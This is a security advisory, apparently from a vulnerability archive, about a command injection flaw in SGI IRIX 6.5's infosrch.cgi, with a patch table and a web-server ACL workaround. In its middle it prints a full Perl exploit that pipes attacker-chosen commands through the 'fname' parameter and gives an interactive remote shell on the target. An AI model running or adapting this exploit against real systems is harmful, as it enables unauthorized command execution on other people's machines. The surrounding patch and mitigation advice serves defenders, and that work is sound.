

    IRIX 6.5-6.5.7


    'jared' found following.   InfoSearch is a web-based  interface to
    books, manpages, and  relnotes, distributed by  SGI.  No  suprises
    here, no  parsing is  done on  the 'fname'  variable before  being
    passed to man2html. (i.e. when  cmd is 'getdoc' and db  is 'man').
    Also, fname is  the _full path_  to the manpage/relnote!   There's
    could  be  more  vulnerabilities  lurking  about  in  this script.

    According to 'rpc', SGI's security advisory regarding infosrch.cgi
    minimizes the actual vulnerability.  Not only does it allow you to
    view any file on the system, an attacker can easily run  arbitrary
    commands.  Below is a simple perl script that demonstrates this.

    #!/usr/bin/perl -w
    # infosearch.cgi interactive shell.
    # usage: ./ hostname
    # 3/4/00
    # --rpc <>
    use IO::Socket;
    use CGI ":escape";
    die "usage: $0 host\n" unless(@ARGV == 1);
    ($host) = shift @ARGV;
    $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";
    # url encode and send a command.
    sub send_cmd
	    my($url_command) = $cgi . CGI::escape(shift);
	    $s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
	    if(!$s) { die "denied.\n"; }
	    print $s "GET $url_command HTTP/1.0\r\n";
	    print $s "User-Agent: \r\n\r\n";
	    @result = <$s>;
	    shift @result until $result[0] =~ /^\r\n/; # uninteresting data.
	    shift @result; $#result--;
    return @result;
    # draw a pseudo prompt. i like "\h:\w \$ ".
    sub prompt
	    @res = send_cmd("/sbin/pwd");
	    chomp($pwd = $res[0]);
	    print "$host:", $pwd, "\$ ";
    while(!eof(STDIN)) {
	    chomp($cmd = <STDIN>);
	    print send_cmd($cmd);


    SGI has investigated the issue and recommends the following  steps
    for  neutralizing  the  exposure.   It  is HIGHLY RECOMMENDED that
    these  measures  be  implemented  on  ALL  vulnerable SGI systems.
    This issue has been corrected in future releases of IRIX.

        OS Version     Vulnerable?     Patch #      Other Actions
        ----------     -----------     -------      -------------
        IRIX 3.x       not tested                   Note 1
        IRIX 4.x       not tested                   Note 1
        IRIX 5.X       not tested                   Note 1
        IRIX 6.0.x-6.1 not tested                   Note 1
        IRIX 6.2          no                        Note 2
        IRIX 6.3-6.4   not tested                   Note 1
        IRIX 6.5-6.5.7    yes           6.5.8       Note 3 & 4
        IRIX 6.5.8        no                        Note 4

    Note 1) This  version  of   the  IRIX operating has been  retired.
            Upgrade to  an actively  supported IRIX  operating system.
            See for
            more information.
    Note 2) This  version  of  the   IRIX  operating  system  is    in
            maintenance mode.  Upgrade  to an actively supported  IRIX
            operating               system.                        See
            more information.
    Note 3) See "Temporary Solution" section.
    Note 4) If you have not received the IRIX 6.5.8 CDs for IRIX  6.5,
            contact your  SGI Support  Provider or  download the  IRIX
            6.5.8 Maintenance Release Stream.

    It's surprising that SGI doesn't mention the Netscape server  ACLs
    that you can use to prevent this. Given that most SGI's out  there
    using the online manpages are  *workstations* this is a safe  fix.
    Note that the  ACLs will disable  anyone else from  getting to the
    web server and associated materials. (But hey, if you're using  an
    SGI/IRIX webserver without securing it, you deserve what you get).

    By default, the server software lives in /usr/ns-home.  We can use
    the  ACLs  built  into  the  server  solution.   Simply  edit your
    magnus.conf file (and replace workstation with the system's  name)
    and add the following line:

        file /usr/ns-home/httpd-workstation/config/magnus.conf:
        ACLFile /usr/ns-home/httpacl/generated.httpd-workstation.acl

    Then create or edit  the file as needed  (note the \ to  point out
    the  line  wrap,   it's  all  one   line  in  the   file).  Change
    "workstayion" to your system's name and to your  system's
    IP address:

        file: /usr/ns-home/httpacl/generated.httpd-workstation.acl:

        ACL httpd-workstation_formgen-WRITE-ACL_deny-3633 (PUT, DELETE, MKDIR, \
        RMDIR, MOVE) {
                Default deny anyone;

        ACL httpd-workstation_formgen-READ-ACL_allow-3633 (GET, HEAD, POST, INDEX)
                Default deny anyone;
                Default allow anyone at (,;